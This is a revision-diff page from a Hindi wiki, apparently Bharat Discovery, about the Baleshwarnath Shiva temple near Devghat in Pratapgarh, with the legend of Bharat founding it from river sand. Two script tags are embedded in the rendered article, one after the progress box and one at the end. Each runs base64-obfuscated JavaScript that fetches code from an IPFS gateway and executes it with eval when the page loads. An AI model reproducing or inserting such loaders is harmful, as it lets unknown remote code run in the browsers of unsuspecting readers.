Difference between revisions of "बालेश्वरनाथ मंदिर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(4 intermediate revisions by 3 users not shown)
Line 1: Line 1:
 
[[चित्र:Baleshwarnath.jpg|250px|thumb|right|बालेश्वरनाथ मंदिर]]  
 
[[चित्र:Baleshwarnath.jpg|250px|thumb|right|बालेश्वरनाथ मंदिर]]  
[[उत्तर प्रदेश]] के [[प्रतापगढ़ ज़िला|प्रतापगढ़]] जनपद में भगवान [[शिव]] को समर्पित त्रेतायुगी बाबा बालेश्वरनाथ मंदिर, जो देवघाट के समीप मोहनगंज में स्थित है।  
+
'''बालेश्वरनाथ मंदिर''' [[उत्तर प्रदेश]] के [[प्रतापगढ़ ज़िला|प्रतापगढ़]] जनपद में भगवान [[शिव]] को समर्पित मंदिर, जो देवघाट के समीप मोहनगंज में स्थित है।
 +
==पौराणिक कथा==
 +
जब [[राम|श्री रामचंद्र]] को चौदह [[वर्ष]] को वनवास मिला था। उस समय में इस पौराणिक [[शिवलिंग]] की स्थापना की गयी जो कि स्वयं [[भरत (दशरथ पुत्र)|भरत]] द्वारा की गयी। जिसका वर्णन [[रामायण]] में इस चौपाई द्वारा वर्णित है।
  
जब [[श्रीराम|श्री राम]] चंद्र को चोदह [[वर्ष]] को वनवास मिला था यह बात उस समय की है तब उस समय में इस पौराणिक [[शिवलिंग]] की स्थापना की गयी जो की स्वयं [[भरत]] द्वारा की गयी।जिसका वर्णन [[रामायण]] में इस चौपाई द्वारा वर्णित है।
+
<blockquote><poem>"सई तीर बस चलू भियानु
 +
श्रृंगवेरपुर फिर तब निकरानु"<ref>वाल्मीकि रामायण में 2/49/12 </ref></poem></blockquote>
  
"सई तीर बस चलू भियानु
+
भरत द्वारा [[सई नदी]] में [[स्नान]] के बाद जब उन्हें [[पूजा]] करने के लिए कोई [[शिवलिंग]] नहीं दिखा तब उन्होंने सई नदी से एक कमंडल [[जल]] भरा तथा दूसरे हाथ में [[बालू]] उठाया जिसे उन्होंने एक भीटे पर रखा और इस प्रकार "बाबा बालेश्वर नाथ" की स्थापना हुई।
श्रृंगवेरपुर फिर तब निकरानु "
 
जो को बाल्मीकि रामायण में 2/49/12 पर वर्णित है।
 
  
[[भरत]] द्वारा [[सई नदी]] में [[स्नान]] के बाद जब उन्हें [[पूजा]] करने के लिए कोई [[शिवलिंग]] नहीं दिखा तब उन्होंने सई नदी से एक कमंडल जल भरा तथा दूसरे हाथ में [[बालू]] उठाया जिसको की उन्होंने एक भीटे पर रखा जिससे "बाबा बालेश्वर नाथ " की स्थापना हुई।
 
  
  
 +
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
  
 
 
<!-- कृपया इस संदेश से ऊपर की ओर ही सम्पादन कार्य करें। ऊपर आप अपनी इच्छानुसार शीर्षक और सामग्री डाल सकते हैं -->
 
 
<!-- यदि आप सम्पादन में नये हैं तो कृपया इस संदेश से नीचे सम्पादन कार्य न करें -->
 
 
 
{{लेख प्रगति|आधार=आधार1|प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 
 
==संबंधित लेख==
 
==संबंधित लेख==
{{उत्तर प्रदेश के मन्दिर}}
+
{{उत्तर प्रदेश के मन्दिर}}{{उत्तर प्रदेश के धार्मिक स्थल}}
 
 
 
[[Category:उत्तर प्रदेश]][[Category:उत्तर प्रदेश के धार्मिक स्थल]][[Category:धार्मिक स्थल कोश]]
 
[[Category:उत्तर प्रदेश]][[Category:उत्तर प्रदेश के धार्मिक स्थल]][[Category:धार्मिक स्थल कोश]]
 
[[Category:हिन्दू मन्दिर]]
 
[[Category:हिन्दू मन्दिर]]
[[Category:हिन्दू धर्म]][[Category:हिन्दू धर्म कोश]]
+
[[Category:हिन्दू धर्म]][[Category:हिन्दू धर्म कोश]][[Category:धर्म कोश]]
 
[[Category:उत्तर प्रदेश के मन्दिर]]
 
[[Category:उत्तर प्रदेश के मन्दिर]]
 
__INDEX__
 
__INDEX__
 
__NOTOC__
 
__NOTOC__

Latest revision as of 10:58, 11 November 2016

250px|thumb|right|baleshvaranath mandir baleshvaranath mandir uttar pradesh ke pratapagadh janapad mean bhagavan shiv ko samarpit mandir, jo devaghat ke samip mohanaganj mean sthit hai.

pauranik katha

jab shri ramachandr ko chaudah varsh ko vanavas mila tha. us samay mean is pauranik shivaliang ki sthapana ki gayi jo ki svayan bharat dvara ki gayi. jisaka varnan ramayan mean is chaupaee dvara varnit hai.

"see tir bas chaloo bhiyanu
shrriangaverapur phir tab nikaranu"[1]

bharat dvara see nadi mean snan ke bad jab unhean pooja karane ke lie koee shivaliang nahian dikha tab unhoanne see nadi se ek kamandal jal bhara tatha doosare hath mean baloo uthaya jise unhoanne ek bhite par rakha aur is prakar "baba baleshvar nath" ki sthapana huee.



panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. valmiki ramayan mean 2/49/12

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>